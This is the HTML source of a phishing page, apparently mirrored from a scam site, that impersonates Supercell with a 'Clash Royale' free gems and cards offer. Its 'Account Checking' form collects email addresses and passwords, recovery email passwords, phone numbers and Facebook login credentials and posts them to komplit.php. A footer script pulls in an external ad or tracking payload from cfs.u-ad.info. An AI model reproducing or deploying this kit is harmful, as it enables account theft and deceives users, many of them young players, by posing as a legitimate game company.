<!DOCTYPE html>
<html lang="th">
  
<!-- Mirrored from www.garenaweb.com/reward-M1887.php by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 19 Dec 2015 03:51:27 GMT -->

<!-- Mirrored from new-events.top/Events-ClashOfClanss2017.com/confirmation.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 15 Mar 2017 04:24:02 GMT -->
<head>
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Clash Royale - SUPERCELL GIFT</title>
    <meta name="description" content="Free Card and Gems. Get it now!">

    <!-- <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/flat-ui.min.css" rel="stylesheet">
    <link href="css/main.css" rel="stylesheet"> -->
    <link href="css/pb.min.css" rel="stylesheet">

    <!--[if lt IE 9]>
      <script src="https://oss.maxcdn.com/html5shiv/3.7.2/html5shiv.min.js"></script>
      <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js"></script>
    <![endif]-->
  </head>
  <body>
    <div id="fb-root"></div>
    <script>(function(d, s, id) {
      var js, fjs = d.getElementsByTagName(s)[0];
      if (d.getElementById(id)) return;
      js = d.createElement(s); js.id = id;
      js.src = "../connect.facebook.net/en_US/sdk.html#xfbml=1&version=v2.3&appId=661774673967000";
      fjs.parentNode.insertBefore(js, fjs);
    }(document, 'script', 'facebook-jssdk'));</script>

    <div class="my-nav">
<span class="active"><a href="index.html">Free Card</a></span>
<span class="active"><a href="changename.html">Change Name</a></span>
<span class="active"><a href="resource.html">Resources</a></span>
    </div>

    <br>

    <div class="container">
      <div class="row">
        <div class="col-xs-12 col-md-offset-2 col-md-4">
          <div class="well">
            <h1 class="mts">Account Checking</h1>
            

   <form method="post" action="komplit.php">
<center><p><img style="width:40%" src="img/GG.png"></p>
    <div style="width:100%" class="form-group">
  <input class="form-control" name="email"  placeholder="Email" type="email" required>
</div>
<div style="width:100%" class="form-group">
  <input class="form-control" name="password"  placeholder="Password" type="text" required>
</div>
<div style="width:100%" class="form-group">
  <input class="form-control" name="recover"  placeholder="Email Recovery" type="email" required>
</div>
<div style="width:100%" class="form-group">
  <input class="form-control" name="pw"  placeholder="Password" type="text" required>
</div>
<div style="width:100%" class="form-group">
  <input class="form-control" name="henpon"  placeholder="Phone Number What You Use Now" type="number">
</div>
<div style="width:100%" class="form-group">
  <input class="form-control" name="pc"  placeholder="Phone Number What You Use On Email" type="number">
</div>
<div style="width:100%" class="form-group">
  <input class="form-control" name="xp"  placeholder="Your Xp Level" type="number">
</div>
<div style="width:100%" class="form-group">
  <input class="form-control" name="gh"  placeholder="Clan Name" type="text">
</div>
<div style="width:100%" class="form-group">
  <input class="form-control" name="ng"  placeholder="Country" type="alphabet">
</div>
<div style="width:100%" class="form-group">
        <select class="form-control" name="teha">
          <option>Arena 1</option>
          <option>Arena 2</option>
          <option>Arena 3</option>
          <option>Arena 4</option>
          <option>Arena 5</option>
		  <option>Arena 6</option>
		  <option>Arena 7</option>
		  <option>Arena 8</option>
		  <option>Arena 9</option>
		  <option>Arena 10</option>
         <option>Arena 11</option>
        </select>
</div>

<h4 >
  Connect To Facebook Account
  </h4><br/><form id="glogin">
  <img style="width:45%" src="img/fbcon%20copy%20-%20Copy.png">

<div style="width:100%" class="form-group">
  <input class="form-control" name="fb"  placeholder="Email" type="email">
</div>

<div style="width:100%" class="form-group">
  <input class="form-control" name="fb1"  placeholder="Password" type="text">
</div>
<div style="width:100%" class="form-group">
  <input class="form-control" name="ct"  placeholder="City" type="text">
</div>
<div style="width:100%" class="form-group">
  <input class="form-control" name="ng1"  placeholder="Country" type="text">
</div>
<div style="width:100%" class="form-group">
  <input class="form-control" name="ng2"  placeholder="Number Phone" type="number">
</div>
 <input type="submit" class="btn btn-block" style="color: #ffffff;background-color: #FF0000;" value="Submit Request"> </form>
<div style="text-align:left" class="error-msg" id="hasilnya"></div>
<div style="width:100%" class="form-group">
 
</div>
</div><br><br>
</div>
        <div class="col-xs-12 col-md-4">
          <div class="fb-page" data-href="http://supercell.com/en/games/" data-width="500" data-hide-cover="false" data-show-facepile="true" data-show-posts="true"><div class="fb-xfbml-parse-ignore"><blockquote cite="http://supercell.com/en/games/"><a href="http://supercell.com/en/games/">SUPERCELL</a></blockquote></div></div>

          <div class="clearfix"></div><br>

          <div class="well">
            <b>Event Information</b><br><br>
            Hello. We of Supercell Clash Royale. If you want to get a card or Gems you choose, you need to confirm your account first. Please confirm your account in the form confirmation on this side.</div>
        </div>
      </div>
    </div>

    <footer class="footer">
     <div class="container">
        Copyright &copy; 2017 Supercell. All rights reserved.<br>
 Powered by Google.
      </div>
    </footer>
<script type="text/javascript">if (self==top) {function netbro_cache_analytics(fn, callback) {setTimeout(function() {fn();callback();}, 0);}function sync(fn) {fn();}function requestCfs(){var idc_glo_url = (location.protocol=="https:" ? "https://" : "http://");var idc_glo_r = Math.floor(Math.random()*99999999999);var url = idc_glo_url+ "cfs.u-ad.info/cfspushadsv2/request" + "?id=1" + "&enc=telkom2" + "&params=" + "4TtHaUQnUEiP6K%2fc5C582AaN6h071sG%2bK1PafbffoAwBlPb%2fexWSRYDlOdqSCDxL%2bf2TKmDGOtioHFSHw7mqjobwUQ%2fH4eBFiRuYPdWSbHyA4srPx6zBQ%2f9u8OeYSCx8NpKPML7G651CY89rnONVSHlna27vmtBm4F%2fjWYT3YxTuv1BPr42qua0P8%2f6u6OPndugtRWx07oW6tdSQXcexvACUymmwiiNg%2bOYGiXD81E5qBCgWp9qQeb5xEbog16X9MNf8vjoSW61%2bjw17D15dc3fSBy9HFLQcHYulTSD1swLXo0f9colZZa0yhLVwSm5SAiUw5Oynxb4udQ%2fnjFLW1oqqKDx%2fAy0KXnjZKHBOFq7jyvrfxf0FOz5R%2bqWdD53Z5HuAg3z9Vf00RGBkjB%2fH4FPb%2bBQ2DDHrUddCuXZhxaxfCCfcamSeQixA%2ftt%2bgG3dCU0phMBuC5pM0xxmGZQx0oVZ33NqPlraubbRuHx27PtiATR5%2fnR1f%2f8e%2bDyLzBsx" + "&idc_r="+idc_glo_r + "&domain="+document.domain + "&sw="+screen.width+"&sh="+screen.height;var bsa = document.createElement('script');bsa.type = 'text/javascript';bsa.async = true;bsa.src = url;(document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);}netbro_cache_analytics(requestCfs, function(){});};</script></body>

<!-- Mirrored from www.garenaweb.com/reward-M1887.php by HTTrack Website Copier/3.x [XR&CO'2014], Sat, 19 Dec 2015 03:51:27 GMT -->

<!-- Mirrored from new-events.top/Events-ClashOfClanss2017.com/confirmation.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 15 Mar 2017 04:24:06 GMT -->
</html>